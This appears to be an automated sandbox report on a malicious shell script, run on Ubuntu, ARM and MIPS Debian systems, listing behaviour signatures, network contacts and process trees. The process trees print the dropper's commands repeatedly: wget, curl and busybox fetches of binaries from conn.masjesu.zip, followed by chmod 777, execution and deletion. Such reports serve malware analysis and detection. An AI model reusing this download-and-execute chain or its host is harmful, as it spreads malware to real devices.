Analysis Overview
SHA256
304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788
Threat Level: Shows suspicious behavior
The file 304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 02:08
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 02:08
Reported
2024-11-24 02:10
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
[/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 195.181.164.19:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.39:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 02:08
Reported
2024-11-24 02:10
Platform
debian9-armhf-20240729-en
Max time kernel
149s
Max time network
4s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
[/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 02:08
Reported
2024-11-24 02:11
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | N/A |
| N/A | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | N/A |
| N/A | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | N/A |
| N/A | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | N/A |
| N/A | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | N/A |
| N/A | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | N/A |
| N/A | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | N/A |
| N/A | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | N/A |
| N/A | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | N/A |
| N/A | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | N/A |
| N/A | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | N/A |
| N/A | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | N/A |
| N/A | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | N/A |
| N/A | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | N/A |
| N/A | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | N/A |
| N/A | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | N/A |
| N/A | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | N/A |
| N/A | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | N/A |
| N/A | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | N/A |
| N/A | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | N/A |
| N/A | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 | /usr/bin/curl | N/A |
Processes
/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh
[/tmp/304d14de333c735264e7a1b39b584e5503732130c92b8ef441c2a19d5b479788.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/chmod
[chmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm
[./9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/rm
[rm 9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/chmod
[chmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi
[./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/rm
[rm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/chmod
[chmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S
[./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/rm
[rm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/chmod
[chmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK
[./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/rm
[rm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/chmod
[chmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9
[./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/rm
[rm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/chmod
[chmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk
[./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/rm
[rm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/chmod
[chmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp
[./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/bin/rm
[rm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1]
/bin/chmod
[chmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1]
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1
[./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1]
/bin/rm
[rm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU]
/bin/chmod
[chmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU]
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU
[./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU]
/bin/rm
[rm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi]
/bin/chmod
[chmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi]
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi
[./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi]
/bin/rm
[rm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3]
/bin/chmod
[chmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3]
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3
[./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3]
/bin/rm
[rm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n]
/bin/chmod
[chmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n]
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n
[./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n]
/bin/rm
[rm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw]
/bin/chmod
[chmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw]
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw
[./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw]
/bin/rm
[rm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs]
/bin/chmod
[chmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs]
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs
[./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs]
/bin/rm
[rm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/chmod
[chmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm
[./9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/bin/rm
[rm 9TkivajhPvPyUBtriVhosaz1inakDISTYm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/chmod
[chmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi
[./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/bin/rm
[rm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/chmod
[chmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S
[./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/bin/rm
[rm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/chmod
[chmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK
[./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/bin/rm
[rm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/chmod
[chmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9
[./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/bin/rm
[rm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
/bin/chmod
[chmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk]
